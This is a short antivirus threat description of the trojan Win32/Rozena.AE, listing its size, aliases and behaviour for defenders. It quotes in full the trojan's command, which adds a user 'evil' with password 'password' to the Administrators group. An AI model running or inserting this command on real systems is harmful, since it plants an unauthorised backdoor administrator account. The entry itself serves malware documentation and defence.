Win32/Rozena [Threat Name] go to Threat
Win32/Rozena.AE [Threat Variant Name]
Category | trojan |
Size | 87552 B |
Aliases | Downloader-CAG (McAfee) |
Win32/Heur (AVG) |
Short description
Win32/Rozena.AE is a trojan that creates a new Windows user account.
Installation
The trojan does not create any copies of itself.
Other information
The trojan executes the following command:
- cmd.exe /c net user evil password /ADD && net localgroup Administrators evil /ADD
The trojan creates a new user account with the username:
- evil
and the password:
- password
The trojan adds the user "evil" to the "Administrators" group.